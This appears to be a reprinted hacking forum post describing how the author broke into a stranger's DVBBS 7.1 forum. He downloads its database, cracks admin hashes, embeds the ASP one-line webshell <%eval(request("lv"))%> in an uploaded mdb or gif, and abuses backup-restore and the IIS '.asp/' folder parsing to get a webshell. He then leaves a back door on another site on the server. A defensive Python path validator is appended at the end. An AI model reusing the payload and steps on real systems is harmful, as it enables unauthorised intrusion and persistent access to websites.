SoFunction
Updated on 2025-04-09

DVBBS7.1 background backup gets a webshell

Reprinted from: /?tid=565
Author: firefox+lvhuana

When I was online this morning I was very bored, and none of my friends were online.

While I was bored, QQ suddenly rang: a stranger wanted to add me. I read his profile first. Oh, it turns out this person has a personal website, so I accepted his request and then started looking at his personal site. It turned out to be a plug-in site. I was confused: why would someone from a plug-in site add me? . . .

I thought I would go into his site and have a look. I opened Ming Xiaozi's side-note tool, version 2.2 (it starts up fast, I like it), scanned, and saw that there are several sites on the server where his site is hosted. After scanning carefully, I found that the database of a DVBBS 7.1 forum was the default one. I downloaded it, and the anti-virus software confirmed there was no * in it (some bored people now like to plant a * under the default database name to fish for victims, so be careful). I opened the database, found the administrator's back-end account password and front-end account password hashes, and cracked them. I was lucky: the MD5 hash was cracked in a few minutes, and the front-end password was all digits.

I logged in to the front end, then to the back end. I haven't worked on a domestic site for a long time, so this was a chance to get my hand in. . . . Old trick: upload a one-sentence ASP * of my own, inserted into a gif picture (with the extension changed to .gif, of course). The upload succeeded, and then I went to the back end to restore the database. Dizzy: why did it prompt "unrecognized database format"? It failed. . It seems Dongwang is much more mature now; it probably checks the file header? ? Let's find another way. .

I saw that version 7.1 now has a blog function, so I checked the blog settings in the back end and suddenly noticed there are upload settings where the upload type can also be set, so I added the mdb file format. Not bad; that raises the chance of success. Then I built an empty mdb database locally containing <%eval(request("lv"))%>, uploaded it, and it uploaded successfully. Then I was dizzy again: why doesn't it display the relative path directly, only fileid=1? . . So I went to the blog management in the back end to look for it, found that the upload folder is Boke/UploadFile/, and then found the mdb file I had uploaded in the upload management. Now, can Dongwang still stop me from restoring the database!?

The database was successfully restored as .asp, hehe, and a webshell was obtained. Then I entered the server and found it was Win2k3; it seemed there was no chance to execute cmd. After walking around I found the D drive, which could actually be traversed, and Serv-U was installed on it. I browsed and found the physical path of the target site, jumped to its directory, and left a back door. Okay, done playing; time to retreat.

Since it is a Win2k3 system, everyone should know that if a folder on Win2k3 is named .asp, any file in that folder is processed as ASP. Let's test this in depth. Change the backup path in the back-end backup to .asp/ (if you are afraid it will fail, URL-encode it as %2easp/), then back up the database. This yields a .asp directory. Then set the file upload directory to .asp/ in the upload settings, so that all files are uploaded to this folder. Back at the front end, upload my one-sentence * inserted into the gif file. After the upload succeeds, http://www.****.com/.asp/2006-2/ is our shell. Connecting with the client gives a 2006 webshell. However, after entering the password it returns a 404 error. The reason is that IE drops the .asp; put http://www.******.com/.asp/2006-2/ in front of ?%23=Execute(Session(%22%23%22))&pageName=PageList, and after that the webshell works normally.
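A defender-side check for the two weaknesses this write-up relies on, added here as an illustration in Python (it is not DVBBS code): a restore routine that writes an uploaded .mdb under a caller-chosen extension, and a backup or upload directory whose name contains ".asp", including the URL-encoded "%2easp/" form. The Jet header constant is the standard Access (Jet 3/4) file signature; as the write-up shows, a header check alone is not enough, which is why the path and extension rules do the real work.

```python
from urllib.parse import unquote
import posixpath
import re

JET_MAGIC = b"\x00\x01\x00\x00Standard Jet DB"   # Jet 3/4 header at offset 0
ALLOWED_EXT = (".mdb",)                           # restore may only write .mdb
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_-]+$")      # names: no dots at all

def normalize(raw: str) -> str:
    """URL-decode until stable (catches %2e and %252e) and collapse the path."""
    prev, path = None, raw
    while prev != path:
        prev, path = path, unquote(path)
    return posixpath.normpath(path.replace("\\", "/"))

def check_restore_target(raw: str) -> str:
    """Validate a backup/restore/upload destination; raise ValueError if unsafe.

    Rejects absolute paths, traversal, any directory segment containing a dot
    (so ".asp/" or "%2easp/" never becomes a folder IIS 6 hands to the ASP
    engine) and any extension other than .mdb (so restore cannot write x.asp).
    """
    path = normalize(raw)
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        raise ValueError(f"absolute path rejected: {raw!r}")
    parts = path.split("/")
    if ".." in parts:
        raise ValueError(f"traversal rejected: {raw!r}")
    *dirs, name = parts
    for d in dirs:
        if not SEGMENT_RE.match(d):
            raise ValueError(f"bad directory segment {d!r} in {raw!r}")
    stem, ext = posixpath.splitext(name)
    if ext.lower() not in ALLOWED_EXT or not SEGMENT_RE.match(stem):
        raise ValueError(f"file name {name!r} not allowed")
    return path

def is_safe_restore_target(raw: str) -> bool:
    """Boolean wrapper for callers that only need to log and deny."""
    try:
        check_restore_target(raw)
        return True
    except ValueError:
        return False

def looks_like_jet_db(data: bytes) -> bool:
    """Header sanity check only: a genuine .mdb can still carry ASP text inside."""
    return data.startswith(JET_MAGIC)
```

The stem check also rejects double extensions such as backup.asp.mdb, and the repeated decoding means a doubly encoded %252easp/ is caught as well.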

This is just a quick post; there may be other, simpler methods, and I hope anyone who knows them will tell me.